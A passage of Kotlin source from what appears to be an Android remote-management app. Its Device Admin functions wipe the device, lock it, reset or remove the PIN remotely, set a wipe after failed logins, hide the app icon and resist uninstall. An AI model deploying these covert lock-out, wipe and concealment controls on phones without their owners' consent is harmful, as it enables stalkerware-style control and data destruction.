    60тЖТ    60тЖТ    60тЖТ
    61тЖТ    61тЖТ    61тЖТ    // ===== WIPE DATA =====
    62тЖТ    62тЖТ    62тЖТ    fun wipeData(context: Context): String {
    63тЖТ    63тЖТ    63тЖТ        return try {
    64тЖТ    64тЖТ    64тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
    65тЖТ    65тЖТ    65тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
    66тЖТ    66тЖТ    66тЖТ            
    67тЖТ    67тЖТ    67тЖТ            if (!dpm.isAdminActive(adminComponent)) {
    68тЖТ    68тЖТ    68тЖТ                return "Device Admin not active. Enable it first."
    69тЖТ    69тЖТ    69тЖТ            }
    70тЖТ    70тЖТ    70тЖТ            
    71тЖТ    71тЖТ    71тЖТ            // Wipe all data
    72тЖТ    72тЖТ    72тЖТ            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.Q) {
    73тЖТ    73тЖТ    73тЖТ                // Wipe with factory reset protection
    74тЖТ    74тЖТ    74тЖТ                dpm.wipeData(DevicePolicyManager.WIPE_EXTERNAL_STORAGE or DevicePolicyManager.WIPE_RESET_PROTECTION_DATA)
    75тЖТ    75тЖТ    75тЖТ            } else {
    76тЖТ    76тЖТ    76тЖТ                dpm.wipeData(DevicePolicyManager.WIPE_EXTERNAL_STORAGE)
    77тЖТ    77тЖТ    77тЖТ            }
    78тЖТ    78тЖТ    78тЖТ            "Device wipe initiated..."
    79тЖТ    79тЖТ    79тЖТ        } catch (e: Exception) {
    80тЖТ    80тЖТ    80тЖТ            Log.e(TAG, "Wipe data error", e)
    81тЖТ    81тЖТ    81тЖТ            "Error: ${e.message}"
    82тЖТ    82тЖТ    82тЖТ        }
    83тЖТ    83тЖТ    83тЖТ    }
    84тЖТ    84тЖТ    84тЖТ
    85тЖТ    85тЖТ    85тЖТ    // ===== FACTORY RESET =====
    86тЖТ    86тЖТ    86тЖТ    fun factoryReset(context: Context): String {
    87тЖТ    87тЖТ    87тЖТ        return wipeData(context)
    88тЖТ    88тЖТ    88тЖТ    }
    89тЖТ    89тЖТ    89тЖТ
    90тЖТ    90тЖТ    90тЖТ    // ===== LOCK SCREEN =====
    91тЖТ    91тЖТ    91тЖТ    fun lockScreenNow(context: Context): String {
    92тЖТ    92тЖТ    92тЖТ        return try {
    93тЖТ    93тЖТ    93тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
    94тЖТ    94тЖТ    94тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
    95тЖТ    95тЖТ    95тЖТ            
    96тЖТ    96тЖТ    96тЖТ            if (!dpm.isAdminActive(adminComponent)) {
    97тЖТ    97тЖТ    97тЖТ                return "Device Admin not active. Enable it first."
    98тЖТ    98тЖТ    98тЖТ            }
    99тЖТ    99тЖТ    99тЖТ            
   100тЖТ   100тЖТ   100тЖТ            dpm.lockNow()
   101тЖТ   101тЖТ   101тЖТ            "Screen locked"
   102тЖТ   102тЖТ   102тЖТ        } catch (e: Exception) {
   103тЖТ   103тЖТ   103тЖТ            Log.e(TAG, "Lock screen error", e)
   104тЖТ   104тЖТ   104тЖТ            "Error: ${e.message}"
   105тЖТ   105тЖТ   105тЖТ        }
   106тЖТ   106тЖТ   106тЖТ    }
   107тЖТ   107тЖТ   107тЖТ
   108тЖТ   108тЖТ   108тЖТ    // ===== LOCK SCREEN WITH PASSWORD =====
   109тЖТ   109тЖТ   109тЖТ    fun lockWithPassword(context: Context, params: Map<String, Any>): String {
   110тЖТ   110тЖТ   110тЖТ        return try {
   111тЖТ   111тЖТ   111тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   112тЖТ   112тЖТ   112тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   113тЖТ   113тЖТ   113тЖТ            
   114тЖТ   114тЖТ   114тЖТ            if (!dpm.isAdminActive(adminComponent)) {
   115тЖТ   115тЖТ   115тЖТ                return "Device Admin not active. Enable it first."
   116тЖТ   116тЖТ   116тЖТ            }
   117тЖТ   117тЖТ   117тЖТ            
   118тЖТ   118тЖТ   118тЖТ            val password = params["password"]?.toString() ?: params["arg"]?.toString() ?: ""
   119тЖТ   119тЖТ   119тЖТ            if (password.isEmpty()) {
   120тЖТ   120тЖТ   120тЖТ                return "Password required"
   121тЖТ   121тЖТ   121тЖТ            }
   122тЖТ   122тЖТ   122тЖТ            
   123тЖТ   123тЖТ   123тЖТ            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
   124тЖТ   124тЖТ   124тЖТ                // Reset password with new one
   125тЖТ   125тЖТ   125тЖТ                val result = dpm.resetPassword(
   126тЖТ   126тЖТ   126тЖТ                    password,
   127тЖТ   127тЖТ   127тЖТ                    DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY
   128тЖТ   128тЖТ   128тЖТ                )
   129тЖТ   129тЖТ   129тЖТ                
   130тЖТ   130тЖТ   130тЖТ                if (result) {
   131тЖТ   131тЖТ   131тЖТ                    dpm.lockNow()
   132тЖТ   132тЖТ   132тЖТ                    "Password set and screen locked"
   133тЖТ   133тЖТ   133тЖТ                } else {
   134тЖТ   134тЖТ   134тЖТ                    "Failed to set password"
   135тЖТ   135тЖТ   135тЖТ                }
   136тЖТ   136тЖТ   136тЖТ            } else {
   137тЖТ   137тЖТ   137тЖТ                @Suppress("DEPRECATION")
   138тЖТ   138тЖТ   138тЖТ                val result = dpm.resetPassword(password, DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY)
   139тЖТ   139тЖТ   139тЖТ                if (result) {
   140тЖТ   140тЖТ   140тЖТ                    dpm.lockNow()
   141тЖТ   141тЖТ   141тЖТ                    "Password set and screen locked"
   142тЖТ   142тЖТ   142тЖТ                } else {
   143тЖТ   143тЖТ   143тЖТ                    "Failed to set password"
   144тЖТ   144тЖТ   144тЖТ                }
   145тЖТ   145тЖТ   145тЖТ            }
   146тЖТ   146тЖТ   146тЖТ        } catch (e: Exception) {
   147тЖТ   147тЖТ   147тЖТ            Log.e(TAG, "Lock with password error", e)
   148тЖТ   148тЖТ   148тЖТ            "Error: ${e.message}"
   149тЖТ   149тЖТ   149тЖТ        }
   150тЖТ   150тЖТ   150тЖТ    }
   151тЖТ   151тЖТ   151тЖТ
   152тЖТ   152тЖТ   152тЖТ    // ===== SHOW / HIDE APP ICON =====
   153тЖТ   153тЖТ   153тЖТ    fun showApp(context: Context): String {
   154тЖТ   154тЖТ   154тЖТ        return try {
   155тЖТ   155тЖТ   155тЖТ            val pm = context.packageManager
   156тЖТ   156тЖТ   156тЖТ            val componentName = ComponentName(context, "com.abuzahra.manager.MainActivity")
   157тЖТ   157тЖТ   157тЖТ            pm.setComponentEnabledSetting(
   158тЖТ   158тЖТ   158тЖТ                componentName,
   159тЖТ   159тЖТ   159тЖТ                PackageManager.COMPONENT_ENABLED_STATE_ENABLED,
   160тЖТ   160тЖТ   160тЖТ                PackageManager.DONT_KILL_APP
   161тЖТ   161тЖТ   161тЖТ            )
   162тЖТ   162тЖТ   162тЖТ            "App icon shown"
   163тЖТ   163тЖТ   163тЖТ        } catch (e: Exception) {
   164тЖТ   164тЖТ   164тЖТ            Log.e(TAG, "Show app error", e)
   165тЖТ   165тЖТ   165тЖТ            "Error: ${e.message}"
   166тЖТ   166тЖТ   166тЖТ        }
   167тЖТ   167тЖТ   167тЖТ    }
   168тЖТ   168тЖТ   168тЖТ
   169тЖТ   169тЖТ   169тЖТ    fun hideApp(context: Context): String {
   170тЖТ   170тЖТ   170тЖТ        return try {
   171тЖТ   171тЖТ   171тЖТ            val pm = context.packageManager
   172тЖТ   172тЖТ   172тЖТ            val componentName = ComponentName(context, "com.abuzahra.manager.MainActivity")
   173тЖТ   173тЖТ   173тЖТ            pm.setComponentEnabledSetting(
   174тЖТ   174тЖТ   174тЖТ                componentName,
   175тЖТ   175тЖТ   175тЖТ                PackageManager.COMPONENT_ENABLED_STATE_DISABLED,
   176тЖТ   176тЖТ   176тЖТ                PackageManager.DONT_KILL_APP
   177тЖТ   177тЖТ   177тЖТ            )
   178тЖТ   178тЖТ   178тЖТ            "App icon hidden"
   179тЖТ   179тЖТ   179тЖТ        } catch (e: Exception) {
   180тЖТ   180тЖТ   180тЖТ            Log.e(TAG, "Hide app error", e)
   181тЖТ   181тЖТ   181тЖТ            "Error: ${e.message}"
   182тЖТ   182тЖТ   182тЖТ        }
   183тЖТ   183тЖТ   183тЖТ    }
   184тЖТ   184тЖТ   184тЖТ
   185тЖТ   185тЖТ   185тЖТ    // ===== CHANGE PASSCODE / SET PIN =====
   186тЖТ   186тЖТ   186тЖТ    fun changePasscode(context: Context, params: Map<String, Any>): String {
   187тЖТ   187тЖТ   187тЖТ        return try {
   188тЖТ   188тЖТ   188тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   189тЖТ   189тЖТ   189тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   190тЖТ   190тЖТ   190тЖТ            
   191тЖТ   191тЖТ   191тЖТ            if (!dpm.isAdminActive(adminComponent)) {
   192тЖТ   192тЖТ   192тЖТ                return "Device Admin not active. Enable it first."
   193тЖТ   193тЖТ   193тЖТ            }
   194тЖТ   194тЖТ   194тЖТ            
   195тЖТ   195тЖТ   195тЖТ            val password = params["password"]?.toString() ?: params["arg"]?.toString() ?: ""
   196тЖТ   196тЖТ   196тЖТ            if (password.isEmpty()) {
   197тЖТ   197тЖТ   197тЖТ                return "Password required. Usage: password"
   198тЖТ   198тЖТ   198тЖТ            }
   199тЖТ   199тЖТ   199тЖТ            
   200тЖТ   200тЖТ   200тЖТ            // Check password quality requirements
   201тЖТ   201тЖТ   201тЖТ            if (password.length < 4) {
   202тЖТ   202тЖТ   202тЖТ                return "Password must be at least 4 characters"
   203тЖТ   203тЖТ   203тЖТ            }
   204тЖТ   204тЖТ   204тЖТ            
   205тЖТ   205тЖТ   205тЖТ            val result = if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
   206тЖТ   206тЖТ   206тЖТ                dpm.resetPassword(
   207тЖТ   207тЖТ   207тЖТ                    password,
   208тЖТ   208тЖТ   208тЖТ                    DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY
   209тЖТ   209тЖТ   209тЖТ                )
   210тЖТ   210тЖТ   210тЖТ            } else {
   211тЖТ   211тЖТ   211тЖТ                @Suppress("DEPRECATION")
   212тЖТ   212тЖТ   212тЖТ                dpm.resetPassword(password, DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY)
   213тЖТ   213тЖТ   213тЖТ            }
   214тЖТ   214тЖТ   214тЖТ            
   215тЖТ   215тЖТ   215тЖТ            if (result) {
   216тЖТ   216тЖТ   216тЖТ                "Password changed successfully"
   217тЖТ   217тЖТ   217тЖТ            } else {
   218тЖТ   218тЖТ   218тЖТ                "Failed to change password"
   219тЖТ   219тЖТ   219тЖТ            }
   220тЖТ   220тЖТ   220тЖТ        } catch (e: Exception) {
   221тЖТ   221тЖТ   221тЖТ            Log.e(TAG, "Change passcode error", e)
   222тЖТ   222тЖТ   222тЖТ            "Error: ${e.message}"
   223тЖТ   223тЖТ   223тЖТ        }
   224тЖТ   224тЖТ   224тЖТ    }
   225тЖТ   225тЖТ   225тЖТ    
   226тЖТ   226тЖТ   226тЖТ    fun setPin(context: Context, params: Map<String, Any>): String {
   227тЖТ   227тЖТ   227тЖТ        return changePasscode(context, params)
   228тЖТ   228тЖТ   228тЖТ    }
   229тЖТ   229тЖТ   229тЖТ    
   230тЖТ   230тЖТ   230тЖТ    fun removePin(context: Context): String {
   231тЖТ   231тЖТ   231тЖТ        return try {
   232тЖТ   232тЖТ   232тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   233тЖТ   233тЖТ   233тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   234тЖТ   234тЖТ   234тЖТ            
   235тЖТ   235тЖТ   235тЖТ            if (!dpm.isAdminActive(adminComponent)) {
   236тЖТ   236тЖТ   236тЖТ                return "Device Admin not active"
   237тЖТ   237тЖТ   237тЖТ            }
   238тЖТ   238тЖТ   238тЖТ            
   239тЖТ   239тЖТ   239тЖТ            // Set empty password to remove
   240тЖТ   240тЖТ   240тЖТ            if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.O) {
   241тЖТ   241тЖТ   241тЖТ                dpm.resetPassword("", DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY)
   242тЖТ   242тЖТ   242тЖТ            } else {
   243тЖТ   243тЖТ   243тЖТ                @Suppress("DEPRECATION")
   244тЖТ   244тЖТ   244тЖТ                dpm.resetPassword("", DevicePolicyManager.RESET_PASSWORD_REQUIRE_ENTRY)
   245тЖТ   245тЖТ   245тЖТ            }
   246тЖТ   246тЖТ   246тЖТ            
   247тЖТ   247тЖТ   247тЖТ            "PIN removed"
   248тЖТ   248тЖТ   248тЖТ        } catch (e: Exception) {
   249тЖТ   249тЖТ   249тЖТ            "Error: ${e.message}"
   250тЖТ   250тЖТ   250тЖТ        }
   251тЖТ   251тЖТ   251тЖТ    }
   252тЖТ   252тЖТ   252тЖТ
   253тЖТ   253тЖТ   253тЖТ    // ===== PASSWORD POLICIES =====
   254тЖТ   254тЖТ   254тЖТ    fun setPasswordQuality(context: Context, params: Map<String, Any>): String {
   255тЖТ   255тЖТ   255тЖТ        return try {
   256тЖТ   256тЖТ   256тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   257тЖТ   257тЖТ   257тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   258тЖТ   258тЖТ   258тЖТ            
   259тЖТ   259тЖТ   259тЖТ            if (!dpm.isAdminActive(adminComponent)) {
   260тЖТ   260тЖТ   260тЖТ                return "Device Admin not active"
   261тЖТ   261тЖТ   261тЖТ            }
   262тЖТ   262тЖТ   262тЖТ            
   263тЖТ   263тЖТ   263тЖТ            val quality = params["quality"]?.toString() ?: "something"
   264тЖТ   264тЖТ   264тЖТ            
   265тЖТ   265тЖТ   265тЖТ            val qualityConstant = when (quality.lowercase()) {
   266тЖТ   266тЖТ   266тЖТ                "unspecified" -> DevicePolicyManager.PASSWORD_QUALITY_UNSPECIFIED
   267тЖТ   267тЖТ   267тЖТ                "something" -> DevicePolicyManager.PASSWORD_QUALITY_SOMETHING
   268тЖТ   268тЖТ   268тЖТ                "numeric" -> DevicePolicyManager.PASSWORD_QUALITY_NUMERIC
   269тЖТ   269тЖТ   269тЖТ                "numeric_complex" -> DevicePolicyManager.PASSWORD_QUALITY_NUMERIC_COMPLEX
   270тЖТ   270тЖТ   270тЖТ                "alphabetic" -> DevicePolicyManager.PASSWORD_QUALITY_ALPHABETIC
   271тЖТ   271тЖТ   271тЖТ                "alphanumeric" -> DevicePolicyManager.PASSWORD_QUALITY_ALPHANUMERIC
   272тЖТ   272тЖТ   272тЖТ                "complex" -> DevicePolicyManager.PASSWORD_QUALITY_COMPLEX
   273тЖТ   273тЖТ   273тЖТ                else -> DevicePolicyManager.PASSWORD_QUALITY_SOMETHING
   274тЖТ   274тЖТ   274тЖТ            }
   275тЖТ   275тЖТ   275тЖТ            
   276тЖТ   276тЖТ   276тЖТ            dpm.setPasswordQuality(adminComponent, qualityConstant)
   277тЖТ   277тЖТ   277тЖТ            "Password quality set to $quality"
   278тЖТ   278тЖТ   278тЖТ        } catch (e: Exception) {
   279тЖТ   279тЖТ   279тЖТ            "Error: ${e.message}"
   280тЖТ   280тЖТ   280тЖТ        }
   281тЖТ   281тЖТ   281тЖТ    }
   282тЖТ   282тЖТ   282тЖТ    
   283тЖТ   283тЖТ   283тЖТ    fun setPasswordMinimumLength(context: Context, params: Map<String, Any>): String {
   284тЖТ   284тЖТ   284тЖТ        return try {
   285тЖТ   285тЖТ   285тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   286тЖТ   286тЖТ   286тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   287тЖТ   287тЖТ   287тЖТ            
   288тЖТ   288тЖТ   288тЖТ            if (!dpm.isAdminActive(adminComponent)) {
   289тЖТ   289тЖТ   289тЖТ                return "Device Admin not active"
   290тЖТ   290тЖТ   290тЖТ            }
   291тЖТ   291тЖТ   291тЖТ            
   292тЖТ   292тЖТ   292тЖТ            val length = (params["length"] as? Number)?.toInt() 
   293тЖТ   293тЖТ   293тЖТ                ?: params["arg"]?.toString()?.toIntOrNull() 
   294тЖТ   294тЖТ   294тЖТ                ?: 6
   295тЖТ   295тЖТ   295тЖТ            
   296тЖТ   296тЖТ   296тЖТ            dpm.setPasswordMinimumLength(adminComponent, length)
   297тЖТ   297тЖТ   297тЖТ            "Minimum password length set to $length"
   298тЖТ   298тЖТ   298тЖТ        } catch (e: Exception) {
   299тЖТ   299тЖТ   299тЖТ            "Error: ${e.message}"
   300тЖТ   300тЖТ   300тЖТ        }
   301тЖТ   301тЖТ   301тЖТ    }
   302тЖТ   302тЖТ   302тЖТ    
   303тЖТ   303тЖТ   303тЖТ    fun setMaximumFailedPasswords(context: Context, params: Map<String, Any>): String {
   304тЖТ   304тЖТ   304тЖТ        return try {
   305тЖТ   305тЖТ   305тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   306тЖТ   306тЖТ   306тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   307тЖТ   307тЖТ   307тЖТ            
   308тЖТ   308тЖТ   308тЖТ            if (!dpm.isAdminActive(adminComponent)) {
   309тЖТ   309тЖТ   309тЖТ                return "Device Admin not active"
   310тЖТ   310тЖТ   310тЖТ            }
   311тЖТ   311тЖТ   311тЖТ            
   312тЖТ   312тЖТ   312тЖТ            val attempts = (params["attempts"] as? Number)?.toInt()
   313тЖТ   313тЖТ   313тЖТ                ?: params["arg"]?.toString()?.toIntOrNull()
   314тЖТ   314тЖТ   314тЖТ                ?: 5
   315тЖТ   315тЖТ   315тЖТ            
   316тЖТ   316тЖТ   316тЖТ            dpm.setMaximumFailedPasswordsForWipe(adminComponent, attempts)
   317тЖТ   317тЖТ   317тЖТ            "Device will wipe after $attempts failed password attempts"
   318тЖТ   318тЖТ   318тЖТ        } catch (e: Exception) {
   319тЖТ   319тЖТ   319тЖТ            "Error: ${e.message}"
   320тЖТ   320тЖТ   320тЖТ        }
   321тЖТ   321тЖТ   321тЖТ    }
   322тЖТ   322тЖТ   322тЖТ
   323тЖТ   323тЖТ   323тЖТ    // ===== BIOMETRIC =====
   324тЖТ   324тЖТ   324тЖТ    fun enableBiometric(context: Context): String {
   325тЖТ   325тЖТ   325тЖТ        return try {
   326тЖТ   326тЖТ   326тЖТ            // Check if biometric is available
   327тЖТ   327тЖТ   327тЖТ            val biometricManager = BiometricManager.from(context)
   328тЖТ   328тЖТ   328тЖТ            val canAuthenticate = when (biometricManager.canAuthenticate(BiometricManager.Authenticators.BIOMETRIC_STRONG or BiometricManager.Authenticators.DEVICE_CREDENTIAL)) {
   329тЖТ   329тЖТ   329тЖТ                BiometricManager.BIOMETRIC_SUCCESS -> true
   330тЖТ   330тЖТ   330тЖТ                BiometricManager.BIOMETRIC_ERROR_NO_HARDWARE -> return "No biometric hardware"
   331тЖТ   331тЖТ   331тЖТ                BiometricManager.BIOMETRIC_ERROR_HW_UNAVAILABLE -> return "Biometric hardware unavailable"
   332тЖТ   332тЖТ   332тЖТ                BiometricManager.BIOMETRIC_ERROR_NONE_ENROLLED -> {
   333тЖТ   333тЖТ   333тЖТ                    // Open settings to enroll
   334тЖТ   334тЖТ   334тЖТ                    if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.R) {
   335тЖТ   335тЖТ   335тЖТ                        context.startActivity(Intent(Settings.ACTION_BIOMETRIC_ENROLL).apply {
   336тЖТ   336тЖТ   336тЖТ                            addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   337тЖТ   337тЖТ   337тЖТ                        })
   338тЖТ   338тЖТ   338тЖТ                    } else if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.P) {
   339тЖТ   339тЖТ   339тЖТ                        context.startActivity(Intent(Settings.ACTION_FINGERPRINT_ENROLL).apply {
   340тЖТ   340тЖТ   340тЖТ                            addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   341тЖТ   341тЖТ   341тЖТ                        })
   342тЖТ   342тЖТ   342тЖТ                    } else {
   343тЖТ   343тЖТ   343тЖТ                        context.startActivity(Intent(Settings.ACTION_SECURITY_SETTINGS).apply {
   344тЖТ   344тЖТ   344тЖТ                            addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   345тЖТ   345тЖТ   345тЖТ                        })
   346тЖТ   346тЖТ   346тЖТ                    }
   347тЖТ   347тЖТ   347тЖТ                    return "No biometric enrolled. Opening settings"
   348тЖТ   348тЖТ   348тЖТ                }
   349тЖТ   349тЖТ   349тЖТ                BiometricManager.BIOMETRIC_ERROR_SECURITY_UPDATE_REQUIRED -> return "Security update required"
   350тЖТ   350тЖТ   350тЖТ                BiometricManager.BIOMETRIC_ERROR_UNSUPPORTED -> return "Biometric unsupported"
   351тЖТ   351тЖТ   351тЖТ                BiometricManager.BIOMETRIC_STATUS_UNKNOWN -> return "Biometric status unknown"
   352тЖТ   352тЖТ   352тЖТ                else -> false
   353тЖТ   353тЖТ   353тЖТ            }
   354тЖТ   354тЖТ   354тЖТ            
   355тЖТ   355тЖТ   355тЖТ            if (canAuthenticate) {
   356тЖТ   356тЖТ   356тЖТ                "Biometric is available and configured"
   357тЖТ   357тЖТ   357тЖТ            } else {
   358тЖТ   358тЖТ   358тЖТ                "Biometric not available"
   359тЖТ   359тЖТ   359тЖТ            }
   360тЖТ   360тЖТ   360тЖТ        } catch (e: Exception) {
   361тЖТ   361тЖТ   361тЖТ            Log.e(TAG, "Enable biometric error", e)
   362тЖТ   362тЖТ   362тЖТ            "Error: ${e.message}"
   363тЖТ   363тЖТ   363тЖТ        }
   364тЖТ   364тЖТ   364тЖТ    }
   365тЖТ   365тЖТ   365тЖТ
   366тЖТ   366тЖТ   366тЖТ    fun disableBiometric(context: Context): Map<String, Any> {
   367тЖТ   367тЖТ   367тЖТ        return try {
   368тЖТ   368тЖТ   368тЖТ            val intent = when {
   369тЖТ   369тЖТ   369тЖТ                Build.VERSION.SDK_INT >= Build.VERSION_CODES.R -> {
   370тЖТ   370тЖТ   370тЖТ                    Intent(Settings.ACTION_BIOMETRIC_ENROLL).apply {
   371тЖТ   371тЖТ   371тЖТ                        addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   372тЖТ   372тЖТ   372тЖТ                        putExtra("biometric_enroll", true)
   373тЖТ   373тЖТ   373тЖТ                    }
   374тЖТ   374тЖТ   374тЖТ                }
   375тЖТ   375тЖТ   375тЖТ                Build.VERSION.SDK_INT >= Build.VERSION_CODES.P -> {
   376тЖТ   376тЖТ   376тЖТ                    Intent(Settings.ACTION_FINGERPRINT_ENROLL).apply {
   377тЖТ   377тЖТ   377тЖТ                        addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   378тЖТ   378тЖТ   378тЖТ                    }
   379тЖТ   379тЖТ   379тЖТ                }
   380тЖТ   380тЖТ   380тЖТ                else -> {
   381тЖТ   381тЖТ   381тЖТ                    Intent(Settings.ACTION_SECURITY_SETTINGS).apply {
   382тЖТ   382тЖТ   382тЖТ                        addFlags(Intent.FLAG_ACTIVITY_NEW_TASK)
   383тЖТ   383тЖТ   383тЖТ                    }
   384тЖТ   384тЖТ   384тЖТ                }
   385тЖТ   385тЖТ   385тЖТ            }
   386тЖТ   386тЖТ   386тЖТ            context.startActivity(intent)
   387тЖТ   387тЖТ   387тЖТ            mapOf(
   388тЖТ   388тЖТ   388тЖТ                "status" to "opened_settings",
   389тЖТ   389тЖТ   389тЖТ                "message" to "Opening security/biometric settings. Biometric cannot be disabled programmatically for security reasons - user must manually remove biometric data.",
   390тЖТ   390тЖТ   390тЖТ                "action_required" to "user_manual_removal"
   391тЖТ   391тЖТ   391тЖТ            )
   392тЖТ   392тЖТ   392тЖТ        } catch (e: Exception) {
   393тЖТ   393тЖТ   393тЖТ            mapOf("error" to (e.message ?: "Failed to open settings"))
   394тЖТ   394тЖТ   394тЖТ        }
   395тЖТ   395тЖТ   395тЖТ    }
   396тЖТ   396тЖТ   396тЖТ    
   397тЖТ   397тЖТ   397тЖТ    fun getBiometricStatus(context: Context): Map<String, Any> {
   398тЖТ   398тЖТ   398тЖТ        return try {
   399тЖТ   399тЖТ   399тЖТ            val biometricManager = BiometricManager.from(context)
   400тЖТ   400тЖТ   400тЖТ            val status = biometricManager.canAuthenticate(BiometricManager.Authenticators.BIOMETRIC_STRONG or BiometricManager.Authenticators.DEVICE_CREDENTIAL)
   401тЖТ   401тЖТ   401тЖТ            
   402тЖТ   402тЖТ   402тЖТ            val statusMessage = when (status) {
   403тЖТ   403тЖТ   403тЖТ                BiometricManager.BIOMETRIC_SUCCESS -> "Biometric ready"
   404тЖТ   404тЖТ   404тЖТ                BiometricManager.BIOMETRIC_ERROR_NO_HARDWARE -> "No biometric hardware"
   405тЖТ   405тЖТ   405тЖТ                BiometricManager.BIOMETRIC_ERROR_HW_UNAVAILABLE -> "Hardware unavailable"
   406тЖТ   406тЖТ   406тЖТ                BiometricManager.BIOMETRIC_ERROR_NONE_ENROLLED -> "No biometric enrolled"
   407тЖТ   407тЖТ   407тЖТ                BiometricManager.BIOMETRIC_ERROR_SECURITY_UPDATE_REQUIRED -> "Security update required"
   408тЖТ   408тЖТ   408тЖТ                BiometricManager.BIOMETRIC_ERROR_UNSUPPORTED -> "Unsupported"
   409тЖТ   409тЖТ   409тЖТ                BiometricManager.BIOMETRIC_STATUS_UNKNOWN -> "Status unknown"
   410тЖТ   410тЖТ   410тЖТ                else -> "Unknown status"
   411тЖТ   411тЖТ   411тЖТ            }
   412тЖТ   412тЖТ   412тЖТ            
   413тЖТ   413тЖТ   413тЖТ            mapOf(
   414тЖТ   414тЖТ   414тЖТ                "status_code" to status,
   415тЖТ   415тЖТ   415тЖТ                "status" to statusMessage,
   416тЖТ   416тЖТ   416тЖТ                "can_authenticate" to (status == BiometricManager.BIOMETRIC_SUCCESS)
   417тЖТ   417тЖТ   417тЖТ            )
   418тЖТ   418тЖТ   418тЖТ        } catch (e: Exception) {
   419тЖТ   419тЖТ   419тЖТ            mapOf("error" to (e.message ?: "Unknown error"))
   420тЖТ   420тЖТ   420тЖТ        }
   421тЖТ   421тЖТ   421тЖТ    }
   422тЖТ   422тЖТ   422тЖТ
   423тЖТ   423тЖТ   423тЖТ    // ===== ANTI UNINSTALL =====
   424тЖТ   424тЖТ   424тЖТ    fun antiUninstallOn(context: Context): String {
   425тЖТ   425тЖТ   425тЖТ        return try {
   426тЖТ   426тЖТ   426тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   427тЖТ   427тЖТ   427тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   428тЖТ   428тЖТ   428тЖТ            
   429тЖТ   429тЖТ   429тЖТ            if (!dpm.isAdminActive(adminComponent)) {
   430тЖТ   430тЖТ   430тЖТ                // Request device admin
   431тЖТ   431тЖТ   431тЖТ                return "Device Admin must be activated for anti-uninstall protection. Use request_device_admin first."
   432тЖТ   432тЖТ   432тЖТ            }
   433тЖТ   433тЖТ   433тЖТ            
   434тЖТ   434тЖТ   434тЖТ            // Device admin already provides anti-uninstall protection
   435тЖТ   435тЖТ   435тЖТ            "Anti-uninstall protection active (Device Admin enabled)"
   436тЖТ   436тЖТ   436тЖТ        } catch (e: Exception) {
   437тЖТ   437тЖТ   437тЖТ            Log.e(TAG, "Anti-uninstall on error", e)
   438тЖТ   438тЖТ   438тЖТ            "Error: ${e.message}"
   439тЖТ   439тЖТ   439тЖТ        }
   440тЖТ   440тЖТ   440тЖТ    }
   441тЖТ   441тЖТ   441тЖТ
   442тЖТ   442тЖТ   442тЖТ    fun antiUninstallOff(context: Context): String {
   443тЖТ   443тЖТ   443тЖТ        return try {
   444тЖТ   444тЖТ   444тЖТ            val dpm = context.getSystemService(Context.DEVICE_POLICY_SERVICE) as DevicePolicyManager
   445тЖТ   445тЖТ   445тЖТ            val adminComponent = ComponentName(context, DeviceAdminReceiver::class.java)
   446тЖТ   446тЖТ   446тЖТ            
   447тЖТ   447тЖТ   447тЖТ            if (dpm.isAdminActive(adminComponent)) {
   448тЖТ   448тЖТ   448тЖТ                Log.w(TAG, "antiUninstallOff: Removing Device Admin entirely (all policies will be lost)")
   449тЖТ   449тЖТ   449тЖТ                dpm.removeActiveAdmin(adminComponent)
   450тЖТ   450тЖТ   450тЖТ                "Warning: Device Admin removed entirely. All admin policies are now disabled."
   451тЖТ   451тЖТ   451тЖТ            } else {
   452тЖТ   452тЖТ   452тЖТ                "Device Admin was not active"
   453тЖТ   453тЖТ   453тЖТ            }
   454тЖТ   454тЖТ   454тЖТ        } catch (e: Exception) {
   455тЖТ   455тЖТ   455тЖТ            Log.e(TAG, "Anti-uninstall off error", e)
   456тЖТ   456тЖТ   456тЖТ            "Error: ${e.message}"
   457тЖТ   457тЖТ   457тЖТ        }
   458тЖТ   458тЖТ   458тЖТ    }
   459тЖТ   459тЖТ   459тЖТ
   460тЖТ   460тЖТ   460тЖТ    // ===== DEVICE ADMIN STATUS =====
   461тЖТ   461тЖТ   461тЖТ    fun deviceAdminStatus(context: Context): Map<String, Any> {
   462тЖТ   462тЖТ   462тЖТ        return try {
